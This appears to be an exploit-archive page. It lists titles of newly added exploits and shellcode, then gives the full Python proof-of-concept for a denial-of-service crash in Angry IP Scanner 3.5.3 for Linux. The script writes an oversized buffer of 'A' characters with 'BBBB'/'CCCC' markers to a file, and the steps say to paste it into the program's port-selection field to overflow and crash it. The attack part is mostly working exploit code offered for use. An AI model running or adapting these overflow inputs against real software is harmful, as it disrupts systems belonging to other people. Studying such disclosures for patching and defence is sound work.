1b31850a46
15 changes to exploits/shellcodes Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC) Google Chrome 70 - SQLite Magellan Crash (PoC) Microsoft Windows - 'MsiAdvertiseProduct' Arbitrary File Copy/Read Keybase keybase-redirector - '$PATH' Local Privilege Escalation Adobe Flash ActiveX Plugin 28.0.0.137 - Remote Code Execution (PoC) Netatalk - Bypass Authentication Kubernetes - (Unauthenticated) Arbitrary Requests Kubernetes - (Authenticated) Arbitrary Requests WSTMart 2.0.8 - Cross-Site Scripting WSTMart 2.0.8 - Cross-Site Request Forgery (Add Admin) FrontAccounting 2.4.5 - 'SubmitUser' SQL Injection phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read PhpSpreadsheet < 1.5.0 - XML External Entity (XXE) Linux/x86 - Kill All Processes Shellcode (14 bytes)
24 lines
No EOL
795 B
Python
Executable file
24 lines
No EOL
795 B
Python
Executable file
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
|
|
# Discovery by: Mr Winst0n
|
|
# Discovery Date: 2018-12-22
|
|
# Vendor Homepage: https://angryip.org/
|
|
# Software Link : https://angryip.org/download/
|
|
# Tested Version: 3.5.3 (latest version)
|
|
# Tested on: Kali linux
|
|
# Vulnerability Type: Denial of Service (DoS)
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python angryip.py
|
|
# 2.- Open Xangry.txt and copy content to clipboard
|
|
# 3.- Open Angry IP Scanner
|
|
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
|
|
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
|
|
# 6.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 384
|
|
crash = buffer + "BBBB" + "CCCC"
|
|
f = open("Xangry.txt", "w")
|
|
f.write(crash)
|
|
f.close() |